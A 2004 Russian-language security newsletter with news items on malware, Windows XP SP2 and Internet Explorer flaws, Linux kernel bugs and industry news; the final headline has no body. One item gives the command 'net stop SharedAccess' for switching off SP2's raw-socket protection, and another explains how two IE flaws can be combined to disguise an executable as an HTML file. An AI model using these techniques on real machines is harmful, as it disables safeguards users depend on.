uinC NewsLetter #47, 2004


Приветствуем!

Новости из Security Мира

15/11/2004 17:25 Шестой версии Winamp уже не появится
Корпорация AOL, которая еще в 1999 году приобрела компанию Nullsoft, занимающиеся выпуском популярного медиаплеера Winamp, сейчас испытывает некоторые трудности, связанные с оттоком клиентов. В связи с этим, руководством корпорации было принято решение об экономии финансов, уменьшив затраты на малозначимые внутренние проекты. В число этих проектов попал медиаплеер Winamp.
После ухода создателя Winamp'а Джастина Фрэнкеля из-за конфликтов с новым начальством, проект продолжительное время находился в "подвешенном" состоянии и мало развивался. Теперь же, принятые начальством AOL меры, оставили недовольными и остальных ведущих разработчиков Winamp, которые в итоге покинули компанию AOL Time Warner, написав на днях заявления об уходе.
В сложившийся ситуации корпорация AOL планирует полное закрытие проекта или временное закрытие проекта с возможностью реорганизацию в будущем, а пока пользователям обещается только выпуск версий Winamp, которые будут содержать в себе только исправления ошибок, обнаруженных в предыдущих версиях.
Компьюлента

15/11/2004 17:27 "Кавказ-центр" получил хостинг в Швеции
Информационный сайт чеченских террористов "Кавказ-центр" возобновил работу, переехав в Швецию. Хостинг "Кавказ-центру" был предоставлен шведским интернет-провайдером Rix Telecom (www.port80.se). До этого "Кавказ-центр" работал в Финляндии, но 11 октября был закрыт по требованию финской полиции.
По материалам lenta.ru

15/11/2004 17:34 Американец, обвиняемый в незаконной продаже исходного кода Windows, считает себя невиновным
Американец Уильям Дженовезе, арестованный по обвинению в незаконной продаже исходного кода операционных систем Windows NT 4.0 и Windows 2000, отказывается признавать себя виновным. По словам Дженовезе, Microsoft и правоохранительные органы задержали его только потому, что не смогли установить личности тех, кто украл исходный код Windows в самой компании. В отличие от тысяч других пользователей, воспользовавшихся появившимся исходным кодом, Уильям Дженовезе разместил его на своем сайте illmob.org. "В шутку я разместил объявление, в котором пообещал за небольшую плату поделиться с желающими кодом Windows, который в то время любой желающий качал по IRC", - пояснил Дженовезе. Через несколько дней после того, как Дженовезе разместил свою шутку, ему позвонил человек и поинтересовался суммой, которую надо заплатить за получение кода. "Мне было смешно. Я подумал, что это какой-нибудь идиот, который не знает, как скачать код", - рассказал Дженовезе.
Далее:Лаборатория Касперского

16/11/2004 13:59 Microsoft намерена заявить права на 130 протоколов, включая TCP/IP
Компания Microsoft "порадовала" сообщество разработчиков открытого кода очередными притязаниями "запатентовать еще что-нибудь". В этот раз под прицелом компании оказались более 130 протоколов соединений, включая "главный" - TCP/IP. Насколько обоснованы притязания компании на "святое" и чем это может закончиться, на данном этапе сказать сложно. Особенно учитывая типично монополистский подход Microsoft к вопросам поддержки разработок других компаний. Захват компанией даже нескольких основных протоколов значительно осложнил бы жизнь всем разработчиков систем с открытым кодом. Тем не менее, Microsoft пока не приводит конкретных документов, подтверждающих права компании на интеллектуальную собственность заявленных форматов, равно как и холдинговые права.
PROext

16/11/2004 14:05 Yahoo! готова тестировать собственный антиспамерский стандарт
Компании EarthLink и Yahoo! заявили в понедельник о готовности начать тестирование антиспамерской технологии DomainKeys, сообщает Reuters. В основу технологии заложено внедрение в электронные письма цифровой подписи, которая позволит почтовым серверам отличать обычные письма от спама. Согласно замыслам специалистов Yahoo! цифровая подпись в письмах будет сверяться с подписью SMTP-сервера. Таким образом, пользователи избавятся от писем, идущих с фальшивых или несуществующих электронных адресов. Для рядовых пользователей внедрение DomainKeys должно пройти абсолютно незаметно. Основная часть интернет-экспертов согласна с тем, что DomainKeys обеспечивает более высокий уровень безопасности нежели антиспамерский стандарт SenderID, предложенный компанией Microsoft. Вместе с тем специалисты признают, что внедрить DomainKeys будет значительно сложнее. Кроме того, DomainKeys требует на 10% больше вычислительных ресурсов сервера. В настоящее время DomainKeys используется индийским интернет-провайдером Sify и почтовой службой Google - Gmail.
Viruslist

16/11/2004 14:17 Билл Гейтс отказался играть с модификаторами приставки Xbox
Корпорация Microsoft начала предпринимать активные меры по борьбе с модификациями ее игровой приставки Xbox, сообщает Associated Press. За несколько дней до выпуска компаний уже успевшей стать популярной игры Halo 2 значительное число пользователей оказались отключены от службы Microsoft Xbox Live, позволяющей играть с живыми соперниками в онлайне. Подписываясь на сервис Xbox Live, пользователь автоматически позволяет корпорации собирать данные о своей приставке. Microsoft воспользовалась этим правом и отключила от онлайновой службы тех, кто, по данным корпорации, каким-либо способом модифицировал свою приставку. Так называемые мод-чипы, используемые для изменения возможностей Xbox, а также увеличение ее жесткого диска позволяют слушать с помощью приставки музыку и запускать на ней пиратские диски, а также разработанные для операционной системы Linux программы. Кроме того, мод-чипы позволяют мошенничать в играх, используя "читы". Как сообщил представитель Microsoft, компания предпринимает шаги, необходимые для того, чтобы пользователям никто не мешал. "Наша цель - обеспечить честную онлайновую игру", - заявил он. Microsoft борется с мод-чипами, появившимися одновременно с выпуском Xbox, уже четыре года. Кульминации эта борьба достигла в 2002 году, когда после обращения компании в министерство юстиции был закрыт сайт, на котором продавались мод-чипы и осуществлялся обмен нелегальными копиями игр.
Lenta.ru

16/11/2004 14:30 Adobe обновит PDF-инструменты
Гигант издательского ПО, компания Adobe Systems намерена изменить способ работы с документами на предприятиях. Вчера производитель ПО должен был анонсировать новые версии Acrobat и Reader, своих основных инструментов для создания и просмотра файлов на основе стандарта PDF (Portable Document Format). В числе новых функций расширенные средства коллективной работы, нацеленные на упрощение обмена информацией между предприятиями и их заказчиками или партнерами. До сих пор тем, кто хотел добавить комментарии в документ PDF, нужно было иметь версию Adobe Acrobat, то есть полный набор инструментов PDF-авторинга, говорит директор по маркетингу продукта Adobe Acrobat Пэм Децил. Новая версия Acrobat Professional 7 позволит авторам включать в документы функции комментариев, которые затем будут доступны пользователям новой версии Adobe Reader, бесплатной программы чтения — а теперь и редактирования — файлов PDF. По словам Децил, эти дополнения помогут тем предприятиям, которые уже перешли на внутренний стандарт работы с PDF и теперь хотят распространить его на обмен документами с другими компаниями. Дополнительные функции в бесплатной и широко распространенной программе Reader позволят каждому принять участие в этом процессе.
Более подробно

16/11/2004 14:42 Sun официально представила Solaris 10
Как и ожидалось ранее, 15 ноября, в понедельник Sun официально представила новую версию своей операционной системы Solaris, сообщает "Компьюлента". На создание Solaris 10 компания потратила свыше 500 миллионов долларов США, а результатом работы программистов фирмы стало появление в ОС около 600 новых функций и нескольких уникальных программных механизмов. Прежде всего, стоит выделить так называемую контейнерную технологию. Данная технология позволяет изолировать друг от друга различные участки операционной системы и приложения, что существенно повышает надежность работы компьютера и улучшает безопасность. Всего могут быть назначены до восьми тысяч контейнеров. Вторым важным нововведением в Solaris 10 стала методика выявления и устранения неполадок DTrace, которая обеспечивает возможность мониторинга процесса работы ядра и сопутствующих программ в режиме реального времени. Посредством DTrace администраторы могут быстро решать возникающие проблемы при минимальном снижении производительности компьютерной сети. Кроме того, нельзя не упомянуть новую файловую систему ZFS (Zettabyte File System), благодаря которой облегчается работа с данными при одновременном повышении надежности хранения информации. Среди прочих особенностей новой операционной системы следует назвать встроенный комплекс самодиагностики, высокий уровень безопасности и высокое быстродействие при работе в локальной сети. Наконец, производитель выделяет возможность запуска приложений, изначально разрабатывавшихся под операционную систему Linux. Платформа Solaris 10 ориентирована на использование, в первую очередь, в крупных компьютерных центрах, банках, телекоммуникационных компаниях и правительственных организациях. Операционная система может устанавливаться на компьютеры на базе процессоров Sun Sparc, серверы с чипами Intel и AMD на основе архитектуры х86, а также на компьютеры с 64-разрядными процессорами AMD Opteron. Ниже мы также приводим ссылку, с которой желающие могут скачать ISO-образы новой ОС для платформ SPARC и x86.
Описание Solaris 10
Страница загрузки

16/11/2004 15:02 Вирус ворует банковские пароли
Специалисты по информационной безопасности предупреждают о появлении нового вируса - троянца Banker-AJ. С помощью этой программы мошенники воруют деньги с интернет-счетов. Особенно обеспокоены клиенты банков Abbey, Barclays, Egg, HSBC, Lloyds TSB, Nationwide и NatWest, со счетов которых пропали десятки тысяч долларов. Ведь троян Banker-AJ создан «специально для них». Попадая в компьютер, троян ничем не проявляет себя до тех пор, пока пользователь не посетит сайт одного из этих банков. Тогда Banker-AJ начинает действовать, запоминает банковский пароль клиента и отправляет его хакеру, который может залезть на счет ни о чем не подозревающего пользователя и украсть его деньги. «Людей постоянно предостерегают от электронных сообщений, которые направляют беззаботных пользователей на фальшивые банковские сайты, чтобы узнать конфиденциальную информацию об их счетах. Но это троян особенный - он ждет, пока пользователь отправится на настоящий банковский сайт, а потом тайно следит за тем, как он вводит пароль. Это как будто грабитель смотрит вам через плечо, когда вы набираете PIN-код кредитной карты,- предупреждают специалисты. - Пользователям не стоит паниковать, им нужно просто установить антивирусное программное обеспечение и скачивать обновления, тогда они будут защищены от всех последних опасностей».
Crime-Research.ru

16/11/2004 15:24 Найден новый вирус массовой рассылки Envid
Компания Symantec обнаружила очередную вредоносную программу, получившую название Envid. После запуска этот червь массовой рассылки создает в директории Windows файл Msngrabber.exe, регистрируется в системном реестре, завершает работу ряда запущенных приложений и пытается загрузить из интернета дополнительный компонент с названием NovoDownExe.txt. Далее вирус осуществляет сканирование жестких дисков в поисках адресов электронной почты, по которым впоследствии высылаются сообщения с поддельным адресом и содержимым файла NovoDownExe.txt. Таким образом, червь Envid представляет собой своеобразный спамерский инструмент для организации массовых рассылок рекламного или какого-либо иного характера.
Описание вируса

16/11/2004 15:36 Выход Crypto-Gram
Как и положено, 15 числа текущего месяца выпущен очередной, ноябрьский, номер журнала Crypto-Gram, о чём традиционно сообщил основатель и CTO компании Counterpane Internet Security Брюс Шнайер. В новом номере: Why Election Technology is Hard, Electronic Voting Machines, Clever Virus Attack, Mail-in Ballot Attack, Computer Security and Liability, Crypto-Gram Reprints, World Series Security, News, Counterpane News, The Security of Checks and Balances, The Doghouse: Merced County, Security Information Management Systems (SIMS), Technology and Counterterrorism, Comments from Readers.

16/11/2004 17:00 Finjan: в Windows XP SP2 найдено 10 уязвимостей
Используя десять уязвимостей в Windows XP, обнаруженных в ServicePack 2, хакеры могут «незаметно и удаленно» взять под контроль компьютеры миллионов пользователей во время посещения веб-страниц с вредоносным кодом, утверждают специалисты американской компании Finjan Software. По их словам, SP2 открывает возможность переключать в браузере Internet Explorer «зоны безопасности» с «интернета» на «локальную», выполняя таким образом сценарии, запрещенные для веб-страниц, а именно: работа с файловой системой и запуск исполняемых файлов. Система предупреждения пользователя о том, что исполняемый файл (.EXE) был загружен из интернета и представляет потенциальную опасность, также может быть отключена. Специалисты компании передали всю информацию в Microsoft и даже продемонстрировали эксплойт и написали за специалистов корпорации код, устраняющий уязвимости. Вместе с тем, они постарались не допустить усиления атак хакеров и не опубликовали подробную информацию о «дырах» до выпуска Microsoft соответствующей «заплаты». «Для предотвращения создания вредоносных кодов представители Finjan не будут сообщать никаких технических подробностей до тех пор, пока Microsoft полностью не устранит уязвимости», — говорится в заявлении компании. Исполнительный директор и основатель Finjan Software Шломо Тобул (Shlomo Touboul) считает, что необходимо менять всю систему: «Хотя недавно выпущенная XP SP2 предоставляет определенную защиту, но эта защита уязвима, поскольку основа — та же самая операционная система с узявимостями, подвергающими опасности конечного пользователя».
CNews

16/11/2004 17:30 Из-за чего люди теряют важную информацию
Компания Ontrack Data Recovery, занимающиеся восстановлением данных с поврежденных носителей, на своем сайте опубликовала некоторый топ происшествий, которые стали причиной обращения людей за помощью в их компанию.
1 место занял мужчина, который умудрился заморозить свой неисправный жесткий диск в морозильной камере холодильника. Свое поведение потерпевший объясняет тем, что соответствующий совет он нашел на одном из веб-сайтов в Интернете.
2 место занял владелец ноутбука, который жаловался на сбои в работе лэптопа и появление ошибок системы, приводящих к "синему экрану смерти". Оказалось, что за это был ответственен его племянник, который, в прямом смысле слова, избил ноутбук за чрезмерную задумчивость.
3 место принадлежит альпинисту, чья цифровая камера разбилась при падении с высоты около 5700 метров, к сожалению, последние моменты жизни камеры так и не удалось восстановить.
4 место занял медицинский работник, которому пришлось заново вбивать информацию о 1200 клиентах только потому, что в трансформаторную будку учреждения ударила молния.
5 место отвоевала семейная пара, забывшая сохранить сотни фотографий своего трехмесячного младенца перед переустановкой операционной системы.
6 место заняли строители, которые лишились портативного компьютера после падения на него металлической балки. К огромному их сожалению, в этом компьютере находились чертежи, возводимого ими здания.
7 место занял человек, который за нестабильную работу своего компьютера решил смыть его в унитаз. Кинув ноутбук в унитаз, он попытался его смыть, нажав несколько раз на спуск воды. После неудавшихся попыток познакомить ноутбук с прелестями канализации, владелец компьютера успокоился, достал ноутбук и принялся искать сервисы по восстановлению нужной ему информации с этого ноутбука.
8 место отвоевала хозяйка ноутбука, который был благополучно забыт на крыше автомобиля. Женщина, как и полагается, завела мотор автомобиля и тронулась, ноутбук в это время тихонько скатился по багажнику на асфальт, все могло бы обойтись, если бы женщина не сдала назад, раздавив его всем весом автомобиля с полностью загруженным багажником.
Компьюлента

17/11/2004 15:36 МИД РФ считает, что Интернет должен контролироваться государством
Министр иностранных дел России Сергей Лавров считает, что государственное регулирование должно распространяться и на сеть Интернет, передает ИТАР-ТАСС. Об этом он заявил во вторник на встрече с журналистами в Москве. Министр заметил, что многие страницы "всемирной паутины" пропагандируют нетерпимость и насилие. Одним их ярких примеров этому служит, по его словам, сайт чеченских сепаратистов "Кавказ-центр", получивший недавно хостинг в Швеции. Глава МИД заявил, что Москву не устраивает продолжающееся функционирование этого интернет-ресурса. Лавров считает, что создание подобных сайтов является ни чем иным, как "подстрекательством к террористической деятельности". Во вторник министр образования Андрей Фурсенко также высказался в пользу государственного контроля над применением Интернета. Правда, Фурсенко, выступая на Всемирном научном форуме в Японии, говорил не о проблемах пропаганды терроризма, а о чрезмерном увлечении людей виртуальном миром. По его мнению, это может привести к возникновению серьезных социальных проблем.
ИТАР-ТАСС

17/11/2004 15:49 Гейтс анонсирует новый инструмент установки обновлений Windows
Во вторник Билл Гейтс рассказал о планах Microsoft по выпуску программного обеспечения системного управления и анонсировал долгожданный инструмент обновления Windows. Выступив на конференции IT Forum в Копенгагене (Дания), основатель Microsoft заявил, что его компания намерена снизить стоимость управления корпоративными вычислительными центрами, выступив с инициативой Dynamic Systems Initiative (DSI). Ожидается, что в IT Forum, крупнейшей европейской конференции Microsoft, примут участие около 4000 ИТ-менеджеров. Microsoft анонсировала также обновления продуктов, относящихся к системному управлению, в том числе первую публичную опытную версию службы автоматического обновления Windows. DSI — это многоуровневый план, направленный на повышение производительности труда системных операторов, наблюдающих за сетями компании. Получив лучшие инструменты управления, администраторы смогут быстрее справляться с большим количеством таких задач, как установка исправлений на серверы. Совершенствование системного администрирования стало задачей первостепенной важности для отделения корпоративного ПО Microsoft. Руководители компании отмечают, что большая часть затрат на ИТ связана с эксплуатацией существующих систем, а не созданием новых бизнес-приложений. На рынке системного управления Microsoft конкурирует с IBM, Hewlett-Packard и другими компаниями. Первые плоды инициативы DSI появятся в будущем году с выпуском Visual Studio 2005, флагманского инструментария программирования Microsoft. Предполагается, что с его помощью разработчики начнут создавать приложения, меньше подверженные сбоям и проблемам производительности.
Подробности

17/11/2004 16:01 Чешский вирусописатель займется созданием антивирусов
Чешская компания Zoner Software, занимающаяся разработкой графических и мультимедийных программ, приняла на работу бывшего вирусописателя. 22-летнему члену группы вирусописателей 29A по имени Бенни поручено заниматься разработкой антивирусного и антихакерского программного обеспечения для интернет-подразделения Zoner Software, сообщает сайт Security Focus. Бенни стал главным разработчиком антивируса Zoner (ZAV). Несмотря на то, что этот продукт пока не предлагается конечным пользователям, назначение бывшего вирусописателя многие все равно расценивают как провокационное. Антивирусная индустрия в основном старается дистанцироваться от авторов вирусов. Таким образом разработчики дают злоумышленникам понять, что их навыки не помогут становлению карьеры в компьютерной индустрии. "Это парадоксально, но деятельность Бенни, в том числе в области написания вирусов стала хорошим доказательством того, что он понимает схему работы вирусных атак. Создатели вирусов часто подчеркивают, что подход к созданию защиты в том или ином продукте оказывается примитивным. Мы уверены, что о разработках Бенни такого сказать будет нельзя", - заявил представитель Zoner Software Эрик Пипер (Erik Piper). Бенни в течение пяти лет занимался созданием незаконных компьютерных программ. Кульминацией его увлечений стало членство в группе 29А с нетрадиционной для вирусописателей концепцией. Члены 29А выступают против массовой рассылки вредоносных программ. Одной из главных "заслуг" Бенни стало создание вируса для ОС Windows 2000 за две недели до ее релиза. По словам Бенни, он никогда не распространял созданные им вирусы.
Viruslist

17/11/2004 16:13 Computer Associates выпустила антишпионское ПО
Компания Computer Associates выпустила программу eTrust PestPatrol Anti-Spyware r5 для обнаружения и удаления шпионских, рекламных, троянских и прочих вредоносных программ, сообщает "Компьюлента". Новый продукт предназначен для защиты корпоративных сетей небольших, средних и крупных компаний. eTrust PestPatrol Anti-Spyware r5 входит в линейку антивирусных программ для управления безопасностью CA eTrust Security Management. Преимуществом новой антишпионской программы является то, что проверка загружаемых файлов, просматриваемых веб-страниц и входящей и исходящей электронной почты происходит незаметно для пользователя. eTrust PestPatrol Anti-Spyware r5 позволяет сетевым администраторам управлять защитой корпоративных сетей как локально, так и удаленно.
О программе

17/11/2004 16:15 Планируется выпуск PC Anywhere for Linux
Компания Symantec в начале декабря собирается выпустить новую версию pcAnywhere за номером 11.5, которая умеет работать с Linux, сообщает linux.org.ru. Программа работает на Red Hat Linux and Novell SUSE Linux. Графический интерфейс инструмента удаленного управления адаптирован для KDE и GNOME.
Подробности

17/11/2004 16:39 «Тефлоновый» вирус неуязвим для антивирусов
В Сети появилось новое семейство вирусов, обладающее повышенной устойчивостью к традиционным антивирусным программам и способное без труда проникать сквозь все существующие барьеры. Как сообщила компания Cearswift, специализирующаяся на обеспечении компьютерной безопасности, новый вирус является «дальним родственником» вируса MyDoom и использует уязвимость «переполнение буфера» браузера Internet Explorer компании Microsoft. Для своего распространения вирус реализует принципиально новую, скользкую, подобно тефлону, стратегию, значительно затрудняющую его обнаружение и борьбу с ним. В отличие от обычных вирусов, Bofra не содержит в себе ничего «криминального» - например, вложений или какого-либо вредоносного скрипта, написанного на HTML. Единственное, что имеется в вирусе – это ссылка, ведущая на инфицированную машину, на которой вирус уже инсталлировал небольшой веб-сервер. При переходе по ссылке на машину пользователя загружается собственно вредоносная программа. Затем она рассылает аналогичные сообщения по адресам, обнаруженным на машине. Пользователям, в частности, предлагается посетить порносайт с веб-камерами, либо он получает сообщение, «подтверждающее» покупку им кредитной карты. По мнению специалистов Clearswift, подобная технология, заключающаяся в создании многочисленных веб-серверов, обеспечивает чрезвычайно быстрое распространение вируса и крайне осложняет борьбу с ним. «Раньше авторы вирусов указывали в рассылаемых пользователям Сети письмах ссылки, ведущие на находящиеся под их управлением сервера, однако они имели статический IP-адрес, - указывается в сообщении Clearswift, - и их было сравнительно нетрудно блокировать. Теперь злоумышленникам удалось обойти проблему. В новом черве используются динамические адреса, что чрезвычайно осложняет борьбу с ними».
Подробнее о вирусе

17/11/2004 16:51 Билл Гейтс: пароль мертв
Смарт-карты и 64-разрядные вычисления – вот будущее ИТ, утверждает председатель совета директоров Microsoft Билл Гейтс, а паролям там места нет. Выступая сегодня на ежегодном ИТ-форуме Microsoft в Копенгагене, легендарный основатель Microsoft официально объявил о том, что пароль мертв, а будущее делового мира - за смарт-картами. Гейтс назвал технологии управления идентификацией (так называемый identity management) «значительным источником запутанности ИТ», добавив, что одна из крупнейших проблем в области информационной безопасности, с которой сталкиваются современные пользователи — так называемый фишинг — не возникла бы вообще, если бы системы были изначально правильно сконфигурированы. «Существует множество случаев, когда люди пытаются взломать системы идентификации. Если бы они были правильно установлены, мы могли бы определить, каким сайтам вы хотите передать информацию, и свести на нет усилия мошенников, занимающихся фишингом», — отметил он. Билл Гейтс также заявил, что пароли как средства обеспечения инфобезопасности обречены на вымирание. «Еще один важный вопрос в области систем идентификации — ненадежность паролей, — говорит он. — Мы не собираемся рассчитывать на их надежность». Что же заменит пароли? По мнению Билла Гейтса, это цифровые средства идентификации, основанные на радиометках и биометрии. «Мы движемся по направлению к биометрии и смарт-картам, — говорит глава софтверного гиганта. — Мы наконец видим, что наши ведущие клиенты начинают предпринимать шаги в этом направлении». Microsoft собирается использовать смарт-карты в своих офисах, а также планирует в сотрудничестве с Axalto создать смарт-карту на платформе Microsoft .Net. «Microsoft будет использовать смарт-карты внутри компании — каждый сотрудник с помощью одной лишь карты сможет входить и выходить из здания и получать доступ к своей машине… они полностью заменят пароли, даже внутри компании», — говорит Билл Гейтс.
CNews

17/11/2004 17:32 Дыра в Windows остаётся открытой 107 дней!
В то время, как Билл Гейтс делает различные пророчества в стиле Нострадамуса и рассказывает о перспективах развития современных операционных систем в ныне работающих ОС остаются незалатанными очень серьёзные уязвимости. Так, известная компания eEye Digital Security уже 107 дней назад (2 августа) поставила M$ в известность о существовании очень серьёзной уязвимости в ОС Windows 2000. Наличие этой уязвимости позволяет удалённому атакующему получить полный контроль над системой (при этом никакой авторизации не требуется)! Единственное, что обнадёживает, это то, что речь, судя по всему идёт об инсталляции по умолчанию (default), так что остаётся надежда на опытность системных администраторов. Как ни странно, несмотря на собственную политику (оставлять разработчику 2 месячный срок для выпуска патча перед опубликованием подробной информации) eEye пока не раскрывает деталей уязвимости. Кроме того, позавчера eEye был отправлен отчёт об ещё одной уязвимости, присутствующей на сей раз в нескольких ОС - сообщается об Win ME/XP/2K/2003, наличие которой позволяет при минимальном вмешательстве удалённого злоумышленника выполнить произвольный код в системе. Детали всё также не разглашаются. А в это время в Копенгагене... на IT-форуме... Разумеется, легче делать прогнозы и анонсировать новые методы аутентификации, чем заниматься нудным делом укрепления безопасности существующих ОС.
Подробности

17/11/2004 19:24 Уязвимости в Internet Explorer
О наличии уязвимостей в Internet Explorer сообщает некто cyber flash. Согласно сообщению автора, наличие этих уязвимостей может позволить обойти ограничения, накладываемые в систему безопасности системы SP2 и привести к обману пользователя, что, в конечном итоге позволит загрузить вредоносные файлы. Первая уязвимость связана с возможностью формирования специального "Content-Location" HTTP-заголовка в загружаемом файле, который позволяет обойти ограничение SP2, связанное с выдачей предупреждения пользователю при открытии файлов определённого типа. В результате файл будет загружен без всякого предупреждающего сообщения. Вторая уязвимость связана с ошибкой, возникающей при сохранении некторых документов с использованием функции Javascript "execCommand()". В результате может быть скрыто настоящее расширение файла в диалоге "Save HTML Document". Успешная эксплуатация уязвимости требует включения опции "Hide extension for known file types" (по умолчанию включена). Комбинация обоих уязвимостей позволяет загрузить на компьютер счастливого пользователя браузера IE в "сами_знаете_какой_ОС" под видом HTML-документа вредоносного исполняемого файла. Наличие уязвимости протестировано на полнопатченной системе с IE6. В качестве меры противодействия до выпуска патча рекомендуется отключить Active Scripting и "Hide extension for known file types".
Подробности

17/11/2004 19:50 Возможность обхода "защиты" Windows XP SP2
Как известно, второй сервис-пак для ОС Windows XP (он же SP2) позиционировался Microsoft, как некий кардинальный инструмент для значительного повышения безопасности этой операционной системы, уязвимости в которой в крайнее время обнаруживались довольно часто (если не сказать больше). Одной из подобных мер защиты, накладываемой на систему после установки SP2 является запрет работы с так называемыми "сырыми" (raw) сокетами. К подобным сетевым пакетам можно отнести как пакеты, формируемыми различными сканерами (например, знаменитым nmap), так и пакеты, в которых в качестве исходного IP-адреса указывался адрес, отличный от системы, с которой он посылался (spoofed IP). Cама M$ сообщала, что подобная особенность позволит ""limit the ability of malicious code to create distributed denial-of-service attacks and limit the ability to send spoofed packets" (см. http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2netwk.mspx#EHAA). Разумеется, подобная "особенность" причиняет некоторые неудобства при работе с некоторыми программами. Однако, как заметили Juergen Schmidt и Holger Lembke, эту защиту можно довольно легко отключить, выдав простую команду: net stop SharedAccess. Об этом было сообщено Microsoft, которая ответила, что это не является уязвимостью в системе безопасности, однако, тем не менее, меры для предотвращения отключения подобной защиты будут приняты.
Подробности

18/11/2004 09:02 Накатывает новая волна RISC-вычислений
Несмотря на всё то, что было писано (и переписано) о потенциальном устаревании платформ на процессорах RISC, они все работают и работают. Между тем сегодня RISC-процессоры как никогда важны для продолжения инноваций в области проектирования компьютеров. Новаторство при конструировании зависит не от экономики больших объемов, концепций производителей микропроцессоров или планов компьютерных компаний. Инновационные конструкции появляются там, где есть опыт выращивания комплексных систем с нуля — от микросхемы до системной платы и кода. Такие компании тесно сотрудничают с конечными пользователями, чтобы узнавать о новых требованиях, и для создания самых передовых систем, отвечающих этим требованиям, используют технологию RISC. В 1980-ые технология RISC (reduced instruction set computing) изменила правила игры в вычислительной технике. Предшественниками RISC были первые процессоры CISC (complex instruction set computing), использовавшие всего около 20% реализованных в них инструкций. RISC-процессорам требуется гораздо меньше инструкций, что делает их более дешевыми в производстве. Спустя почти десятилетие после появления первых коммерческих RISC-процессоров производители CISC-процессоров начали применять принципы конструкции RISC в своих продуктах. Сегодня такие CISC-процессоры, как Pentium 4 и Opteron, преобразуют сложные инструкции в последовательность простых RISC-подобных команд, а затем опираются на мощный RISC-подобный мотор «под капотом» для исполнения получившихся «микроинструкций». Аналогично, спустя примерно десятилетие после того, как RISC-процессоры продемонстрировали 64-разрядную обработку, появились первые процессоры с 64-разрядной архитектурой х86. Теперь перед компьютерной индустрией стоит новый комплекс проблем. Процесс повышения тактовой частоты резко замедлился. Время доступа к памяти увеличилось с нескольких тактовых циклов до сотен тактов. Потребляемая мощность и связанные с этим проблемы тепловыделения быстро выходят из под контроля. Короче, пришла пора конструкторам RISC снова указать путь в новую эру вычислительной техники.
ZDNet

18/11/2004 09:28 Microsoft перевыпустила патч для ISA
Корпорация Microsoft перевыпустила «заплату» для сервера Internet Security and Acceleration (ISA) после пересмотра её кода. В первый раз патч для ISA Server 2000 и Proxy Server 2.0 был выпущен 9 ноября. Пользователи Microsoft Small Business Server 2003 Premium Edition и Small Business Server 2000 могут также загрузить «заплату», так как в данном ПО содержится код ISA. Исправленная уязвимость позволяет хакерам маскировать вредоносный код. Представители Microsoft предупреждали, что с её помощью можно создавать безопасные на вид веб-страницы со встроенными хакерскими программами. Также эксперты корпорации рекомендуют очистить DNS-кэш системы, так как в нем могут содержаться зараженные данные.
CNews

18/11/2004 10:10 Выход ядра Linux 2.4.28
После выхода RC4 объявлено о выходе окончательной версии ядра Linux 2.4.28, ветви, развиваемой параллельно с новой ветвью 2.6. После версии RC3, версия устраняет лишь незначительные баги, никаких изменений в части секьюрити. Фактически, промежуток от предыдущей версии (2.4.27) был заполнен лишь тремя RC и тремя пререлизами (-pre1, ...-pre4).
СhangeLog

18/11/2004 10:38 Хакеры все чаще объединяются в ОПГ
Согласно последнему отчету VeriSign, все больше сетевых атак совершается не хакерами-одиночками, а организованными преступными группировками. Кроме того, качественный уровень атак с каждым годом повышается. Основной целью преступных групп становятся компьютеры обычных интернетчиков. Если ваш компьютер подключен к интернету — вы потенциальная мишень для их атаки, передает News.Com. Атаки преследуют конкретную цель — заработать денег. Для достижения этой цели преступники устраивают DDoS-атаки на сайты компаний, парализуя их деятельность, воруют номера кредитных карт со взломанных компьютеров, продают рекламу в спам-рассылках или торгуют собственными базами данных адресов электропочты. Данные исследования базируются на информации, предоставленной компаниями, владеющими онлайн-сервисами, также были изучен мониторинг доступности сайтов, статистика кражи номеров кредитных карт и обобщенные данные по корпоративной безопасности. Анализ показал, что большинство компьютеров в Америке, подключенных к интернету по широкому каналу, используются преступниками для хакерских атак. Число инцидентов, связанных со взломом компьютеров, увеличилось за год на 150%. Как сообщают исследователи, к сожалению, выявить злоумышленника практически не возможно. Вычислить компьютер, с которого производится атака — вполне реально. Однако за ним сидит обыкновенный интернетчик, который даже не подозревает, что его компьютер тайно используется для злодеяний. По данным VeriSign, которые основываются на анализе почтового трафика клиентов компании, доля спама в сообщениях электропочты достигла 80%. Однако, есть и позитивный момент — средний размер спам-письма меньше, чем средний размер «обычного» письма. В связи с этим доля спама в почтовом трафике составляет только 21%.
"Вебпланета"

18/11/2004 10:51 Microsoft включает поддержку FireWire
Компания официально подтвердила свое намерение добавить FireWire (IEEE-1394) в список поддерживаемых стандартов. Пока, как пишет Reuters, речь идет только о внесении необходимых дополнений в программу обработки и монтажа цифрового видео Microsoft MovieMaker 2, благодаря чему воспользоваться программой смогут и владельцы цифровых видеокамер с FireWire-интерфейсом. В отличие от своего главного конкурента – разработанного Intel стандарта USB 2.0 – интерфейс FireWire, успешно применяемый в большинстве продуктов Apple, позволяет управлять цифровой камерой прямо с рабочего стола, избавляя пользователя от приобретения специальных монтажных пультов. Ожидается, что полноценная поддержка FireWire будет добавлена после выхода очередного сервис-пака для Windows XP.
Internet.Ru

18/11/2004 11:34 Уязвимости в smbfs
Как сообшает Stefan Esser из немецкой компании e-matters, в процессе изучения реализации файловой системы smbfs в ядре Linux были обнаружены уязвимости, позволяющие удалённому атакующему либо вызвать DoS, либо выполнить произвольный код в адресном пространстве ядра. Файловая система smbfs применяется для обеспечения взаимодействия с серерами SAMBA, предоставляющими ресурсы Linux-серверов в распоряжение машин под управлением ОС Windows (с использованием протокола NetBIOS, в терминах Microsoft вышеозначенная файловая система носит название CIFS и опичана вместе с проколом в RFC 1001,1002). Уязвимости связаны с ошибками при обработке функций smb_proc_read() и smb_receive_trans2. Существует, правда достаточно существенное ограничение на область применения атаки. Первое связано с тем, что ни один нормальный системный администратор не выставит наружу SAMBA-сервер. Второе связано с тем, что атакующий должен иметь возможность контролировать соединение между SAMBA-сервером и клиентом, чтобы перхватывать и преобразовывать ответы сервера к клиенту (уязвимость связана с некорректной обработкой специальным образом сформированных SMB-ответов), что предполагает атаку типа MITM (man in the middle - вклинивание атакующего в существующее соединение). Как пишет сам автор, в планы e-matters не входит опубликование эксплоита для широкой общественности. Уязвимости подвержены ядра 2.4 (до 2.4.27 включительно) и 2.6 (до 2.6.9). Патчи для обоих ветвей ядра были предоставлены разработчикам и включены в 2.4.28-rc3 (соответственно, и в вышедшее ядро 2.4.28).
Подробное описание

18/11/2004 11:45 AOL возобновляет работу над браузером Netscape
